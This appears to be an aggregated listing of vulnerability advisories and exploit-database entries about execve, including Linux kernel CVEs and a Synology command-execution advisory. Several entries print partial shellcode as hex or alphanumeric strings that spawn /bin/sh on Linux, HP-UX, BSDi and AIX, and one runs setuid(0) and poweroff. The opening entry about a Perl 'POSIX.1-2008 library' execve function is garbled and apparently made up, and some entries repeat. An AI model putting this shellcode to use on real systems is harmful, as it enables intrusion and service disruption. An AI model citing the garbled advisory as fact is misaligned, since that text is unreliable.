EUVD-2009-2838

Malware in sbrugna...

The vulnerability of the _execve50c() function in the POSIX.1-2008 standard library for the Perl language in version 2008 allows a attacker to execute arbitrary code or cause a service failure.

The vulnerability of the execve50c function in the POSIX.1-2008 standard library for the Perl language in POSIX.2008 is related to the execution of operations beyond the buffer boundaries in memory. Exploiting this vulnerability could allow a remote attacker to execute arbitrary code or cause...

SUSE CVE-2004-1073

The openexec function in the execve functionality exec.c in Linux kernel 2.4.x up to 2.4.27, and 2.6.x up to 2.6.8, allows local users to read non-readable ELF binaries by using the interpreter PTINTERP functionality...

Synology StorageManager smart.cgi Remote Command Execution

Vulnerability Summary The following advisory describes a remote command execution vulnerability found in Synology StorageManager. Storage Manager is “a management application that helps you organize and monitor the storage capacity on your Synology NAS. Depending on the model and number of...

Linux - setuid(0) & execve("/sbin/poweroff -f")

No description provided by source. include stdio.h / linux/x86 ; setuid0 & execve/sbin/poweroff -f 47 bytes written by ka0x - ka0x01alt+64gmail.com lun sep 21 16:40:16 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others! / int main char shellcode...

linux/x86 - execve("/bin/sh") shellcode 25 bytes

Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 - execve"/bin/sh" shellcode 25 bytes ================================================ include include / by Magnefikko 14.04.2010 email protected promhyl.oz.pl Subgroup: PRekambr Name: 2...

SuSE9 Security Update : Linux kernel (YOU Patch Number 12541)

This update fixes various security issues and some bugs in the SUSE Linux Enterprise 9 kernel. The following security bugs were fixed : - A race condition in the pipe2 systemcall could be used by local attackers to execute code. CVE-2009-3547 - On x8664 systems a information leak of high register...

Memory corruption

The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...

CVE-2009-2848

The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...

CVE-2009-2848

The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...

linux/x86 execve /bin/sh IA32 0xff-less 45 bytes

No description provided by source. / 0xff-less execve /bin/sh by anathema [email protected] / include stdio.h include stdlib.h unsigned char code = / Linux/IA32 0xff-less execve shellcode. / "\x89\xe6" / movl %esp, %esi / "\x83\xc6\x30" / addl $0x30, %esi / "\xb8\x2e\x62\x69\x6e" / movl...

HPUX execve /bin/sh 58 bytes

No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...

linux/x86 execve /bin/sh alphanumeric 392 bytes

linux/x86 execve /bin/sh alphanumeric 392 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc = // nops here .. "LLLLXPY3E01E01u03u0fXh8eshXf5VJPfhbifhDefXf5AJfPDTYhKATYX5KATY"...

bsdi/x86 execve /bin/sh 46 bytes

No description provided by source. / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...

Aix - execve /bin/sh 88 bytes

Aix execve /bin/sh 88 bytes. Shellcode exploit for aix platform / Aix execve of /bin/sh Georgi Guninski [email protected] / unsigned int code= 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x906104...

linux chroot()/execve() code

Exploit for linux/x86 platform in category shellcode ============================ linux chroot/execve code ============================ / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered use...